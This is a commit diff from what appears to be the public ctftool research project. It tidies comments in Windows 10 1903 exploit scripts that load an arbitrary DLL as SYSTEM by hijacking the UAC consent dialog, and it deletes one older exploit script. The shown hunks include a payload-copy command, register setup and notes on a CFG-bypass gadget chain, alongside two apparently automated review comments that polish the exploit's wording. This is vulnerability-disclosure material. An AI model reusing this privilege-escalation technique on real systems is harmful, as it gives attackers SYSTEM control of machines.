
remove outdated script, the common scripts are better.

taviso committed Jun 17, 2019
1 parent b68e22f commit 9cd3a4e1170bdd834bddc7d419811f1d37c207c0
Showing with 10 additions and 132 deletions.
  1. +2 −3 scripts/ctf-consent-system.ctf
  2. +7 −8 scripts/ctf-exploit-common-1903.ctf
  3. +0 −120 scripts/ctfmonexploit.ctf
  4. +1 −1 version.rc
@@ -1,11 +1,10 @@
# This script launches loads an arbitrary dll as SYSTEM on Win10 1903 x64. This
# This script loads an arbitrary dll as SYSTEM on Win10 1903 x64. This
# works by taking over the UAC consent dialog, which can be invoked by any
# user (for example, by using the runas verb with ShellExecute()).

# This exploit runs LoadLibraryA(C:\WINDOWS\TEMP\EXPLOIT.DLL) as SYSTEM.
print Attempting to copy exploit payload...

# Try to install the payload.
# This exploit runs LoadLibraryA(C:\WINDOWS\TEMP\EXPLOIT.DLL) as SYSTEM.
run CMD /C COPY PAYLOAD64.DLL %SYSTEMROOT%\TEMP\EXPLOIT.DLL

# Print a warning if that didnt work.
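Review bot: The moved comment on the line above the copy names the payload path as `C:\WINDOWS\TEMP\EXPLOIT.DLL`, while the `run CMD /C COPY` line it now describes writes to `%SYSTEMROOT%\TEMP\EXPLOIT.DLL`; the two only agree when SYSTEMROOT is the default drive and directory. I would make the comment match what the command actually does, `# This exploit runs LoadLibraryA(%SYSTEMROOT%\TEMP\EXPLOIT.DLL) as SYSTEM.`, so a reader checking the script against a host with a non-default system root is not misled. The check that follows ("Print a warning if that didnt work") lies outside the hunk, so I cannot tell whether a failed copy aborts the script or only warns; the comment could say which.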
@@ -1,6 +1,5 @@
# This script launches loads an arbitrary dll as SYSTEM on Win10 1903 x64. This
# works by taking over the UAC consent dialog, which can be invoked by any
# user (for example, by using the runas verb with ShellExecute()).
# This script loads an arbitrary dll into the current default process on Win10
# 1903 x64.

# The function index to reach MSCTF!CTipProxy::Reconvert.
set r3 480
@@ -31,7 +30,7 @@ createstub 0 4 IID_IEnumTfInputProcessorProfiles

# At index 496 of this table is a pointer to MSCTF!CTipProxy::Reconvert, which
# is a whitelsited indirect branch target and happens to rearrange our stack
# so that pointers to buffers we control are on the registers.
# so that pointers to buffers we control are on the registers.
#
# It then does another indirect call to an address we control, so we can build
# a CFG jump chain.
@@ -58,7 +57,7 @@ setarg MARSHAL_TYPE_DATA "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
module64 msvcrt
patch 0 0x40 module 8 r4

# I need to create an object somewhere that my gadgets can use, It needs to look
# I need to create an object somewhere that my gadgets can use, It needs to look
# like an object with a vtable as all of the gadgets I are small thiscall helpers.
# I don't know the address of the stack, but images are only randomized per-boot
# on Windows, so if I use some unused space in the data section of an image I
@@ -145,7 +144,7 @@ repeat r1 callstub 0 0 r3
# 0:000> combase!CStdProxyBuffer_CF_AddRef:
# mov rcx,qword ptr [rcx-38h] <-- pointer inside a buffer we control
# mov rax,qword ptr [rcx] <-- load a vtable, this is offset 0x10 into our string.
# mov rax,qword ptr [rax+8] <-- derefence vtable ptr
# mov rax,qword ptr [rax+8] <-- dereference vtable ptr
# jmp qword ptr [combase!__guard_dispatch_icall_fptr]

# We will use msctf!CCompartmentEventSink::`vftable', the OnChange member is an
@@ -171,7 +170,7 @@ patch 0 0x48 r0 8 +0x38
# MSCTF!CCompartmentEventSink::OnChange.
# jmp qword ptr [combase!__guard_dispatch_icall_fptr]
#
# I know, I know, how the hell does this even work? It took some work.
# I know, I know, how the hell does this even work? It took some work....

# The final stage gadget bounces us back to MSCTF!CCompartmentEventSink::OnChange
# where we can finally load arbitrary rcx and rip.
@@ -311,7 +310,7 @@ repeat r1 callstub 0 0 r3

print The CFG call chain is built, writing in parameters...

# Just jumping to LoadLibraryA() wont do very much unless we also give it an
# Just jumping to LoadLibraryA() wont do very much unless we also give it a
# module to load, so lets write in the address of the buffer immediately after
# our object, then write a path into it.
set r2 module
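Review bot: Two comment typos survive on the new side next to lines this commit retouches: in the hunk at `@@ -58,7 +57,7 @@` the retained line `# like an object with a vtable as all of the gadgets I are small thiscall helpers.` should read `# like an object with a vtable, as all of the gadgets I use are small thiscall helpers.`, and in the hunk at `@@ -31,7 +30,7 @@` the retained line `# is a whitelsited indirect branch target` should read `# is a whitelisted indirect branch target`. In those two hunks the changed line is printed with identical text on both sides, which suggests a trailing-whitespace-only change; if so, fixing the wording in the same pass would avoid a second comment-only touch of the same lines. The surrounding script logic continues outside every hunk shown here.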

This file was deleted.

@@ -15,7 +15,7 @@ FILETYPE VFT_APP
VALUE "CompanyName", "Tavis Ormandy"
VALUE "FileDescription", "Interactive CTF Exploration Tool"
VALUE "ProductName", "ctftool"
VALUE "Comment", "https://github.com/taviso/"
VALUE "Comment", "https://github.com/taviso/ctftool"
}
}
BLOCK "VarFileInfo"
